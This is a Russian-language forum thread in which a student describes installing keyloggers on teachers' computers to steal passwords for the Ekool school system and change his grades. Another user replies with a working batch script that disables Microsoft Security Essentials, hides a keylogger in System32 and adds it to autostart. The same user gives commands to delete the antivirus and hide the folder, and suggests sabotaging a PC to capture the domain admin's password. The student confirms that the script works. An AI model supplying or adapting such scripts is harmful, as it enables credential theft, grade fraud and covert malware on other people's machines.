Задача со сложностью
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Задача со сложностью - 2011-11-03 20:25:22.640000
|
|
|
Galiathus
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-26 21:36:06.443333
|
Кто я и чем занимаюсь
Я - гимназист, ставлю кейлогеры на компьютеры учителей, из логов достаю пароли для системы Ekool, тем самым меняю оценки.
Инфо. о компах
В ассортименте стационарные компьютеры и ноутбуки, ОС - семейство Windows (Win XP, Win 7,Win Vista), в основном, где-то на 95% - ХР, но меня так же интересуют
компьютеры на Vista, поскольку там можно собрать больше всего паролей.
Все подключены к школьной сети посредством кабеля.
На каждом компьютере есть антивирус - Microsoft Security Essentials.
Процесс действий
Во время того, как препод. выходить из класса или вообще отсутсвует в классе долгое время, я получаю физ. доступ к компьютеру,
в то время, как мой напарник стоит на стрёме.
Моя задача: Спрятать на компьютере кейлогер.
Всё бы да ничего, однако времени обычно бывает около 3-6мин, потом, естественно, уже приходит препод + наличие Прав Администратора на машине, у пользователя препода.
Конкретно
0. Проверяю имеет ли пользователь права администратора (далее как ПА)
1. У меня в наличии флэшка, на которой установлен Ccleaner (далее как "клинер") и есть кейлогер.
2. Первым делом я запускаю клинер и сношу антивирус (Microsoft Security Essentials)
3. Прячу кейлогер (C:\Windows\System32\doc) и запускаю его
4. Проверяю через клинер наличие кейлогера в автозапуске
Проблема
Из всего выше можно вынести 2 проблемы: 1 - время, 2 - ПА
Всё чаще стал замечать, что наш школьный ИТ-спец. ставит пользователю препода ограниченные права, из-за чего я не могу снести антивирус и запустить кейлогер.
Решение
Бывает, когда препод. болеет и у нашего класса свободный урок в кабинете + я имею полный доступ к компьютеру и 45мин времени(время урока),
при условии, что это стационырный комп, поскольку ноутбуки преподователи забирают с собой домой.(Но не всегда)
При наличии большого кол-ва времени я гружусь с ERD и убираю пароль админа, а дальше всё по плану.
Но такая возможность выпадает крайне редко, почти не выпадает.
Итого
Нужно сделать так, чтоб я мог уложиться в короткое время и запустить что-то, что сможет дать мне ПА или попасть под учётную запись Администратора.
Потому что нужно выполнить 2 простых действия - снести антивирус и запустить кейлогер.
Я подумывал над каким-нибудь мощненьким вирусом, который убьёт данный антивирус и уберёт из автозагрузки, после чего я смогу залить и запустить кейлогер.
Так же подумывал над упрощением моей задачи, при наличии ПА.
Допустим создать програмку, которая сама снесёт антивирус MSE (на всех компах он на диске С в стандартной папке своей), копирнёт и спрячет (спрячет в папке Windows и сделает невидимой) кейлогер с последующим его запуском.
К сожалению, я не владею языками написания сией программы, но идея хорошая.
Обращаюсь к вам, Господам хакерам и продвинутым юзерам, за помощью над решением моей проблемки.
Пишите доп. вопросы - постараюсь ответить предельно ясно.
Любой помощи буду крайне благодарен,
Заранее всем Спасибо!
|
|
|
|
|
RE: Задача со сложностью - 2011-11-04 00:10:00.313333
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
1. Cеть доменная или просто рабочая группа? (мой компьютер - свойства - имя компьютера - изменить)
2. На XP можно попробовать соорудить батничек (завтра в свободное время попробую), но на висте-7 это не прокатит - UAC не даст.
3. Есть ли у компов доступ в инет?
|
|
|
|
|
RE: Задача со сложностью - 2011-11-04 00:48:26.036666
|
|
|
Galiathus
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-26 21:36:06.443333
|
namepunk
1.Сеть доменная
2.За батничек буду крайне благодарен, если не сложно, добавь потом пояснение, что он делает, а то могу не разобраться полностью, открыв его с блокнотом.
3.Доступ в инет конечно имеется, иначе как бы они заходили в Ekool (ekool.ee), а я бы у них угонял пароли кейлогером + кейлогер отсылает мне логи на почтовый ящик.
Извиняюсь, за то, что не уточнил про Ekool.
Ekool - Interneti Kool, что с эстонского значит - Интернет школа, нам там оценки и дз пишут и тп.
|
|
|
|
|
RE: Задача со сложностью - 2011-11-04 18:34:35.743333
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
quote:
1.Сеть доменная
Если словить пароль администратора домена - вот тут можно будет развернуться. Если обновления не ставяться, можно попробовать посканировать сервера на уязвимости. Либо сделать преподу свинью, у которого админских прав нет и подождать пока ваш админ придет чинить. Он введет свой пароль.
quote:
2.За батничек буду крайне благодарен, если не сложно, добавь потом пояснение, что он делает, а то могу не разобраться полностью, открыв его с блокнотом.
Времени не было сегодня проверить, но думаю что-то вроде такого…Проверь у себя на виртуалке.
rem Останавливаем антивирус и убираем его из автозагрузки.
sc stop msmpsvc
sc config msmpsvc start= disabled
rem можно убрать само приложение из автозапуска чтобы не светилось красным
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "MSC" /f
rem создаем папку для кейлоггера
md c:\windows\system32\doc
rem копируем кейлоггер (предполагаеться что он лежит в папке keylogger, которая находиться рядом с батником)
copy .\keylogger\*.* c:\windows\system32\doc\*.*
rem добавляем его в автозагрузку
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v docs /d "c:\windows\system32\doc\keylogger.exe"
rem запускаем кейлоггер
start c:\windows\system32\doc\keylogger.exe
|
|
|
|
|
RE: Задача со сложностью - 2011-11-13 20:26:20.813333
|
|
|
Galiathus
Сообщений: 3
Оценки: 0
Присоединился: 2011-10-26 21:36:06.443333
|
quote:
Либо сделать преподу свинью, у которого админских прав нет и подождать пока ваш админ придет чинить. Он введет свой пароль.
Тогда как же мы отследим пароль, который он введёт? Какого типа свинью можно придумать?
Ваш батник немного изменил под себя и он полностью работает, большое спасибо!
Ещё такой вопрос: А можно также дописать в батник, чтоб он скрыл папку doc (c:\windows\system32\doc\) и удалил антивирус вообще?
Если что-то из этого можно сделать, могли бы показать команды?
|
|
|
|
|
RE: Задача со сложностью - 2011-11-13 21:02:35.230000
|
|
|
namepunk
Сообщений: 2732
Оценки: 184
Присоединился: 2009-09-15 13:35:36.866666
|
1. Зачем удалять антивирус если он и так не работает? Но если надо то что-то вроде
rmdir /s /q "c:\program files\antivirus"
2. чтобы скрыть папку используй что-то вроде
attrib +R +S +H c:\windows\system32\doc /D
|
|
|
|
|
|
